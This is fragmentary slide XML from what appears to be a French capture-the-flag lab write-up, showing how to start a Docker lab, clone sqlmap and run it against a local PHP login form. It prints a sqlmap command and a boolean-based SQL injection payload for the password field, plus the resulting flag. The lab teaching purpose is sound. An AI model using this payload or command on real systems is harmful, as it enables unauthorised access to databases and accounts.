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23b23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23b23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23b23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23b23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23b23d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523b23d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23b23d6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23b23d6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résolution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sqlmap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dans un premier temps récupérer le docker compose et l’exécuter.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docker-compose up -d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peut taper dans un navigateur pour acceder au site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http://localhost:3001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se connecter à la machine attaquante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docker exec -it kali bash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maintenant installer sqlmap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cela : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="1500"/>
              <a:t>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>n a maintenant le projet en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peut se placer dans le dossier sqlmap-dev/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75" y="2723550"/>
            <a:ext cx="7220399" cy="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maintenant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>exécuter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> sqlmap avec la commande suivante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python3 sqlmap.py “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>http://php/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>” –batch –form –technique B -risk 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On a alors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ici il faut donc insérer dans id : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>3654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et password : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>-5628' OR 2470=2470 AND 'msaf'='msaf</a:t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53340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donc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>exécutant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> on devrait trouver le flag qui est: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0924086489ca5a44e71715a6c00832cb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89751"/>
            <a:ext cx="2518825" cy="15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